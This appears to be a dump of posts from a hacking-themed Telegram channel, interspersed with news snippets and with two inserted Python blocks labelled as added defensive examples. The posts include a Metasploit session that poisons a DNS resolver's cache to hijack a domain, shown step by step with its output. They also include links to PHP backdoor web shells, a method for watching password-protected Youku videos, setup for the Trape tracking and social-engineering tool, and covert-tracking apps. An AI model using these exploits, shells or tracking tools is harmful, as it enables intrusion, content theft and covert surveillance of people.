Forwarded from UNDERCODE NEWS
Through NVIDIA Cloud Games, iOS users will be able to replay "Fortress Night"
#international #Updates
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
SOME HACKER TOOLS:
- CrawlBox - Easy way to brute-force web directory.
- TrackOut - Simple Python IP Tracker.
- sslcaudit - No description provided
- Sublist3r - Fast subdomains enumeration tool for penetration testers.
- doork - Passive Vulnerability Auditor.
- sir - Skype IP Resolver.
- xl-py - No description provided
- netdiscover - netdiscover.
- ATSCAN - Advanced dork Search & Mass Exploit Scanner.
@UndercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
TROJAN, A LIGHTWEIGHT MOBILE LOG SDK:
FEATURES:
Concise API: logging takes only a few lines of code;
Uses the AOP framework Lancet SDK to collect common logs conveniently, with support for incremental compilation;
Uses mmap to keep log writes efficient;
Extensible: developers can customize the log file upload to suit their purpose;
Low traffic overhead: whether a user's log file is uploaded is controlled remotely through online configuration;
High stability: it runs stably in many apps.
INSTALLATION & RUN:
DOWNLOAD https://github.com/eleme/Trojan
Add in the root directory's build.gradle:
    buildscript {
        dependencies {
            ......
            classpath 'me.ele:lancet-plugin:1.0.2'
        }
    }
Add in the app directory's build.gradle:
    apply plugin: 'me.ele.lancet'
    dependencies {
        ......
        provided 'me.ele:lancet-base:1.0.2'
        compile 'me.ele:trojan-library:0.0.5'
    }
Use
1) Initialization
Add in the custom Application:
    TrojanConfig config = new TrojanConfig.Builder(this)
            // Set user information
            .userInfo("xxxx")
            // Set device id
            .deviceId("xxxx")
            // Set the cipher key if the log needs to be encrypted
            .cipherKey("xxxx")
            // Optional, log files are saved on the sdcard by default
            .logDir("xxxx")
            // Console log switch, on by default
            .enableLog(true)
            .build();
    Trojan.init(config);
Special Note:
The log files are stored on the sdcard by default and are not lost even if the application is uninstalled;
To be compatible with multiple processes, each process stores its log files in its own directory;
The log is not encrypted by default; currently only TEA encryption is provided, chosen for its efficiency.
2) Record the log
Trojan provides two ways to record a log.
Firstly:
    Trojan.log("Trojan", "We have a nice day!");
Secondly:
    List<String> msgList = new LinkedList<>();
    msgList.add("Hello Trojan!");
    msgList.add("We have a nice day!");
    msgList.add("Hello world!");
    Trojan.log("Trojan", msgList);
By default, a single-line log is not encrypted; to encrypt it, use the following:
    Trojan.log("Trojan", "We have a nice day!", true);
3) User Information
When the user information changes or the user is switched, call:
    Trojan.refreshUser("new user info");
If the user logs out, pass a null value:
    Trojan.refreshUser(null);
4) Upload Solution
The demo provides a free and simple way to upload log files, such as LeanCloud; you can browse and download the log files.
5) Data Decryption
When an encryption key is set, a single log can be encrypted to protect sensitive data. The encrypted data must be decrypted before the log is analyzed. Use the decryption script as follows:
Compile and generate the decryption .so library on a Mac. The .so library has already been generated in the repository, so this step can be omitted:
    gcc -shared -Wl,-install_name,trojan_decrypt.so -o trojan_decrypt.so -fPIC trojan_decrypt.c
Call the Python script to decrypt the data on a Mac, passing in the decryption key and the path of the file to be decrypted; take note of the path of the Python script:
    python ./trojan_decrypt.py cipher-key cipher-file-path
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Kaminsky DNS Cache Poisoning Flaw Exploit for Domains:
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allows the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing the target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
=======
# /msf3/msfconsole
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D
dns01.metasploit.com.
Use for learning!
@UndercodeTesting
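The `check` step in the session above fails the resolver because all five probes left from the same source port (50391). As an added example (not part of the original post or of Metasploit), the Python below applies the same defensive test to source ports observed at an authoritative server and shows how much guessing space source-port randomization adds. The function names, thresholds and port-pool size are assumptions; the figure of 20 forged replies per query is taken from the run output.

```python
"""Rate a resolver's UDP source-port behaviour and estimate the guessing
space an off-path spoofer faces (defensive audit, constructed samples)."""
import math
import re
from statistics import pstdev

TXID_SPACE = 2 ** 16        # the DNS transaction ID is a 16-bit field
NARROW_STDDEV = 3000.0      # assumed cut-off for "too little spread"
MAX_STEP = 8                # assumed cut-off for "ports just count upwards"
RANDOM_POOL = 65536 - 1024  # assumed pool: every unprivileged port

# Constructed sample: the five probe lines printed by `check` in the post.
CHECK_OUTPUT = """\
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
"""

# Constructed sample: source ports from a resolver that randomizes them.
RANDOMIZED_PORTS = [50391, 12044, 33871, 61002, 2917, 44820, 19455, 58213]

PORT_RE = re.compile(r"PORT:\s*(\d{1,5})\b")


def parse_ports(text):
    """Extract the source ports from `>> ADDRESS: ... PORT: n` lines."""
    ports = [int(m.group(1)) for m in PORT_RE.finditer(text)]
    return [p for p in ports if 0 < p <= 65535]


def rate_ports(ports):
    """Classify ports as STATIC, SEQUENTIAL, NARROW or RANDOMIZED."""
    if len(ports) < 2:
        raise ValueError("need at least two observations")
    if len(set(ports)) == 1:
        return "STATIC"
    steps = [(b - a) % 65536 for a, b in zip(ports, ports[1:])]
    if all(0 < s <= MAX_STEP for s in steps):
        return "SEQUENTIAL"
    if pstdev(ports) < NARROW_STDDEV:
        return "NARROW"
    return "RANDOMIZED"


def search_bits(port_pool):
    """Bits to guess blindly: 16-bit TXID plus the choice of source port."""
    return math.log2(TXID_SPACE * port_pool)


def expected_rounds(spoofed_per_query, port_pool):
    """Average query rounds before one forged reply matches, when
    `spoofed_per_query` distinct guesses arrive ahead of the real answer."""
    return max(1.0, TXID_SPACE * port_pool / spoofed_per_query)


def report(ports, spoofed_per_query=20):
    """Summarize the verdict and the resulting guessing space."""
    verdict = rate_ports(ports)
    if verdict in ("STATIC", "SEQUENTIAL"):
        pool = 1                      # next port is predictable: only the TXID is secret
    elif verdict == "NARROW":
        pool = max(ports) - min(ports) + 1
    else:
        pool = RANDOM_POOL
    return {
        "verdict": verdict,
        "bits": search_bits(pool),
        "rounds": expected_rounds(spoofed_per_query, pool),
    }


if __name__ == "__main__":
    for name, ports in (("post", parse_ports(CHECK_OUTPUT)),
                        ("randomized", RANDOMIZED_PORTS)):
        print(name, report(ports))
```

A resolver rated STATIC or SEQUENTIAL needs its source-port randomization fixed (resolver upgrade, or a NAT device in front of it that rewrites ports predictably); DNSSEC validation removes the dependence on guessing altogether.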
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Youku video cracking method with password:
1) You can set independent playback passwords for videos on the Youku website, but note: you don't need the password to watch a password-protected Youku video. The following describes two methods for cracking a Youku video password.
Youku video password cracking method 1:
2) Open an FLV analysis website (recommended here: http://www.flvcd.com), copy the address of the Youku video to be decrypted from the browser address bar, paste it into the address box of the FLV analysis website, and click "Start GO" to analyze. This gives the real download address of the video file; right-click the download address and select "Save Target As" to download (you can also use download tools such as Thunder, Express, etc., which are very fast).
3) Youku video password cracking method 2:
Just add "xia" (without the double quotes) in front of "youku" in the video address. For example, change http://v.youku.com/v_show/id_xntg1mzc4ndq=.html to http://v.xiayouku.com/v_show/id_xntg1mzc4ndq=.html and open it in the browser to parse the real download address of the video file. The next operation is the same as step 3 of method 1.
Use for learning!
@UndercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
A GOOD WORKING TRACKING TOOL 2020:
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information, such as the status of sessions of their websites or services, and control their users through their browser without their knowledge, but it has evolved with the aim of helping government organizations, companies and researchers to track cybercriminals.
INSTALLATION & RUN:
1) git clone https://github.com/jofpin/trape.git
2) cd trape
3) python2 trape.py -h
If it does not work, try to install all the libraries listed in the file requirements.txt:
4) python2 -m pip install -r requirements.txt
Example of execution
Example: python2 trape.py --url http://example.com --port 8080
HELP AND OPTIONS
user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]
@UndercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
MalConfScan: Volatility plugin to extract configuration data for known malware:
Ursnif
Emotet
Smoke loader
PoisonIvy
CobaltStrike
NetWire
PlugX
RedLeaves / Himawari / Lavender / Armadill / zark20rk
TSCookie
TSC_Loader
xxmm
Datper
Ramnit
HawkEye
Lokibot
Bebloh (Shiotob / URLZone)
AZORult
NanoCore RAT
AgentTesla
FormBook
NodeRAT ( https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html )
MalConfScan also has a function that lists the strings referenced by malicious code.
Malware usually stores its configuration data in encoded form.
Because the malware writes the decoded configuration data to memory, that data may still be in memory.
This function can list the decoded configuration data.
https://github.com/JPCERTCC/MalConfScan/wiki/how-to-install
@UndercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
How to install Apache mod_cloudflare on Debian?
1) Cloudflare provides an official module for the Apache server to capture the visitor's real IP address.
2) Add the GPG key - open a terminal and run the following commands to add the GPG key to your system.
sudo apt install curl
curl -C - https://pkg.cloudflare.com/pubkey.gpg | sudo apt-key add -
Add the repository - then add the Cloudflare repository to your Debian system.
echo "deb http://pkg.cloudflare.com/ $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/cloudflare.list
3) Install the package - then update the Apt cache and install the libapache2-mod-cloudflare package on your Ubuntu system.
sudo apt update
sudo apt install libapache2-mod-cloudflare
4) Press "Y" to confirm the request during installation.
Restart Apache
5) After the installation is complete, restart the Apache2 service and check the active modules using the following commands.
sudo systemctl restart apache2
sudo apache2ctl -M
That's all.
6) The Apache server now logs the visitor's real IP address.
@UndercodeTesting
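The module restores the visitor address from a request header that Cloudflare sets (CF-Connecting-IP). The added Python example below, which is not Cloudflare's module code, shows the check that makes the logged address trustworthy: the header is honoured only when the TCP peer is inside a trusted proxy range. The range subset, function names and sample requests are constructed for illustration.

```python
"""Decide which address to log for a request that may or may not have come
through the reverse proxy (constructed samples, runs offline)."""
import ipaddress

# Assumption: a subset of Cloudflare's published IPv4 ranges, hard-coded so the
# example runs offline; load the current list from https://www.cloudflare.com/ips-v4
TRUSTED_PROXIES = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "104.16.0.0/13", "172.64.0.0/13",
)]

HEADER = "cf-connecting-ip"

# Constructed sample requests: (TCP peer address, request headers).
SAMPLE_REQUESTS = [
    ("173.245.48.10", {"CF-Connecting-IP": "203.0.113.7"}),  # via the proxy
    ("198.51.100.23", {"CF-Connecting-IP": "10.0.0.1"}),     # direct, header supplied by client
    ("104.16.5.9", {"CF-Connecting-IP": "not-an-ip"}),       # via the proxy, malformed value
    ("104.16.5.9", {}),                                      # via the proxy, header missing
    ("198.51.100.23", {}),                                   # direct, no header
]


def is_trusted_proxy(peer, trusted=TRUSTED_PROXIES):
    """True when the TCP peer address lies inside a trusted proxy range."""
    addr = ipaddress.ip_address(peer)
    return any(addr in net for net in trusted)


def client_ip(peer, headers, trusted=TRUSTED_PROXIES):
    """Return (address_to_log, reason).

    The header value is used only when the connection really came from a
    trusted proxy; otherwise the TCP peer address is logged unchanged.
    """
    value = next((v for k, v in headers.items() if k.lower() == HEADER), None)
    if not is_trusted_proxy(peer, trusted):
        # Anyone who can reach the origin directly can send this header.
        return peer, ("untrusted-header" if value is not None else "direct")
    if value is None:
        return peer, "no-header"
    try:
        return str(ipaddress.ip_address(value.strip())), "header"
    except ValueError:
        return peer, "bad-header"


def audit(requests):
    """Resolve every request; 'untrusted-header' and 'direct' entries show
    that the origin is reachable without passing through the proxy."""
    return [client_ip(peer, headers) for peer, headers in requests]


if __name__ == "__main__":
    for (peer, _), (logged, reason) in zip(SAMPLE_REQUESTS, audit(SAMPLE_REQUESTS)):
        print(f"peer={peer:<15} logged={logged:<15} reason={reason}")
```

Requests flagged `untrusted-header` or `direct` mean the origin accepts traffic that bypasses the proxy; restricting the web server's firewall to the proxy ranges closes that path.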
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from UNDERCODER
Preview of Apple Conference in November.
#Technologies
READ MORE - https://undercodenews.com/preview-of-apple-conference-in-november/07/11/2020/
Forwarded from UNDERCODER
New unpatched IBM QRadar SIEM vulnerability could allow an attacker to bypass access restrictions to data.
#Vulnerabilities
READ MORE - https://undercodenews.com/new-unpatched-ibm-qradar-siem-vulnerability-could-allow-a-attacker-can-bypass-access-restrictions-to-data/07/11/2020/
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
2020 GPS TRACKING APPLICATIONS:
https://play.google.com/store/apps/details?id=com.gpsmapcamera.geotagginglocationonphoto&hl=en
https://play.google.com/store/apps/details?id=org.findmykids.app&hl=en_IN
https://apps.apple.com/us/app/google-maps-transit-food/id585027354
https://play.google.com/store/apps/details?id=com.google.android.apps.maps&hl=en_US
https://apps.apple.com/us/app/famisafe-parental-control/id1385417904
https://play.google.com/store/apps/details?id=com.wondershare.famisafe
https://apps.apple.com/us/app/life360-family-locator/id384830320
https://play.google.com/store/apps/details?id=com.life360.android.safetymapd&hl=en
https://my.spyzie.com/signup.html
https://apps.apple.com/us/app/glympse-share-your-location/id330316698
https://play.google.com/store/apps/details?id=com.glympse.android.glympse
@UndercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Largest cryptocurrency seizure: $1,000,000,000 was seized from the wallet of the Silk Road.
#DataBreaches
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
What is PaaS?
1) Platform-as-a-Service (PaaS) is a cloud computing model that provides a platform on which customers can develop, secure, run, and manage web applications.
It provides an optimized environment in which different teams can develop and deploy applications without buying or managing the underlying IT infrastructure and related services.
2) Typically, the platform provides the necessary resources and infrastructure to support the entire software development and deployment lifecycle, while providing developers and users with access from anywhere over the Internet.
3) The benefits of PaaS include, but are not limited to, simplicity, convenience, lower cost, flexibility, and scalability.
4) Typically PaaS protection differs from a traditional on-premises datacenter, as we'll see.
5) The PaaS environment is based on a shared security model.
6) The provider protects the infrastructure, and PaaS customers are responsible for protecting their accounts, applications, and data hosted on the platform.
Ideally, security moves from a local security model to an identity perimeter.
This means that the PaaS customer must place more emphasis on identity as the primary security perimeter.
Issues to look out for include security, testing, code, data and configuration, employees, users, authentication, operations, monitoring, and logs.
@UndercodeTesting
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
New PHP backdoor shells:
[Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)
B374K Shell
[C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)
R57 Shell
[Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)
0byt3m1n1 Shell
[Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)
AK-47 Shell
[Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)
Marion001 Shell
[Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)
p0wny-shell
[Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)
Webadmin Shell
[Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)
LazyShell
@UndercodeTesting